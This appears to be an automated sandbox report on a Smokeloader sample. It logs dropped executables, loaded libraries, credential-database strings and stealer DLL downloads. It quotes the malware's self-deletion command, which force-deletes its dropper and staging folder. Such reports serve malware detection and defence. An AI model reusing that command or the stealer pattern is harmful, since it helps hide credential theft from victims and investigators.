                Source: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/35@7/9
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Code function: 9_2_6CFA0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError
                Source: C:\Users\user\Desktop\4.exe Code function: 0_2_02EF20CD CreateToolhelp32Snapshot,Module32First
                Source: C:\Users\user\AppData\Local\Temp\F441.exe Code function: 6_2_0042B20E CoCreateInstance
                Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\sdveeeu
                Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3192
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
                Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\F441.tmp
                Source: 4.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\4.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: softokn3[1].dll.9.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: softokn3[1].dll.9.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: softokn3[1].dll.9.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                Source: softokn3[1].dll.9.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                Source: softokn3[1].dll.9.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                Source: softokn3[1].dll.9.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                Source: softokn3[1].dll.9.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                Source: kat796E.tmp, kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: softokn3[1].dll.9.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                Source: F441.exe, 00000006.00000003.2062240344.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2547989323.000000000093D000.00000004.00000020.00020000.00000000.sdmp, AKECBF.9.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: softokn3[1].dll.9.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                Source: softokn3[1].dll.9.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                Source: 4.exe ReversingLabs: Detection: 39%
                Source: 4.exe Virustotal: Detection: 45%
                Source: unknown Process created: C:\Users\user\Desktop\4.exe "C:\Users\user\Desktop\4.exe"
                Source: unknown Process created: C:\Users\user\AppData\Roaming\sdveeeu C:\Users\user\AppData\Roaming\sdveeeu
                Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F441.exe C:\Users\user\AppData\Local\Temp\F441.exe
                Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\9EDA.exe C:\Users\user\AppData\Local\Temp\9EDA.exe
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exe Process created: C:\Users\user\AppData\Local\Temp\kat796E.tmp C:\Users\user\AppData\Local\Temp\kat796E.tmp
                Source: C:\Users\user\AppData\Local\Temp\F441.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 1640
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat796E.tmp" & rd /s /q "C:\ProgramData\HJJJECFIECBG" & exit
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\4.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\4.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\4.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: sxs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: mozglue.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: msvcp140.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: dlnashext.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: wpdshext.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\4.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: 4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: mozglue.pdbP source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
                Source: Binary string: freebl3.pdb source: freebl3.dll.9.dr
                Source: Binary string: freebl3.pdbp source: freebl3.dll.9.dr
                Source: Binary string: nss3.pdb@ source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
                Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.9.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
                Source: Binary string: nss3.pdb source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
                Source: Binary string: mozglue.pdb source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr
                Source: Binary string: softokn3.pdb source: softokn3[1].dll.9.dr

                Data Obfuscation

                Source: C:\Users\user\Desktop\4.exeUnpacked PE file: 0.2.4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\sdveeeuUnpacked PE file: 5.2.sdveeeu.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\F441.exeUnpacked PE file: 6.2.F441.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\F441.exeUnpacked PE file: 6.2.F441.exe.400000.0.unpack
                Source: sqls[1].dll.9.drStatic PE information: section name: .00cfg
                Source: freebl3.dll.9.drStatic PE information: section name: .00cfg
                Source: freebl3[1].dll.9.drStatic PE information: section name: .00cfg
                Source: mozglue.dll.9.drStatic PE information: section name: .00cfg
                Source: mozglue[1].dll.9.drStatic PE information: section name: .00cfg
                Source: msvcp140.dll.9.drStatic PE information: section name: .didat
                Source: msvcp140[1].dll.9.drStatic PE information: section name: .didat
                Source: nss3.dll.9.drStatic PE information: section name: .00cfg
                Source: nss3[1].dll.9.drStatic PE information: section name: .00cfg
                Source: softokn3.dll.9.drStatic PE information: section name: .00cfg
                Source: softokn3[1].dll.9.drStatic PE information: section name: .00cfg
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_00402CD7 push cs; retf 0_2_00402CD8
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_00401EA7 push 0000000Eh; retf 0038h0_2_00401EB6
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_004033B6 push eax; ret 0_2_00403419
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02DD1F0E push 0000000Eh; retf 0038h0_2_02DD1F1D
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02DD2D3E push cs; retf 0_2_02DD2D3F
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02EF4AC3 push eax; ret 0_2_02EF4AC4
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02EF38DD push 0000000Eh; retf 0038h0_2_02EF38EC
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02EF386D push cs; retf 0038h0_2_02EF38EC
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02EF444F push cs; retf 0_2_02EF4450
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02EF343A push ss; iretw 0_2_02EF344C
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02EF9919 push 0000002Ah; iretd 0_2_02EF9963
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_00402CD7 push cs; retf 5_2_00402CD8
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_00401EA7 push 0000000Eh; retf 0038h5_2_00401EB6
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_004033B6 push eax; ret 5_2_00403419
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_02E12D3E push cs; retf 5_2_02E12D3F
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_02E11F0E push 0000000Eh; retf 0038h5_2_02E11F1D
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_03013315 push 0000000Eh; retf 0038h5_2_03013324
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_03019351 push 0000002Ah; iretd 5_2_0301939B
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_03012E72 push ss; iretw 5_2_03012E84
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_03013E87 push cs; retf 5_2_03013E88
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_030132A5 push cs; retf 0038h5_2_03013324
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_030144FB push eax; ret 5_2_030144FC
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_00441DE9 push ebp; ret 6_2_00441E02
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_00441FE4 pushad ; retf 0041h6_2_00441FE5
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_0211030D push ecx; ret 6_2_02110315
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeCode function: 8_2_0429B010 push edx; ret 8_2_0429B21F
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeCode function: 8_2_0429A910 push edx; ret 8_2_0429A91B
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F441.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\nss3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\vcruntime140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\freebl3.dllJump to dropped file
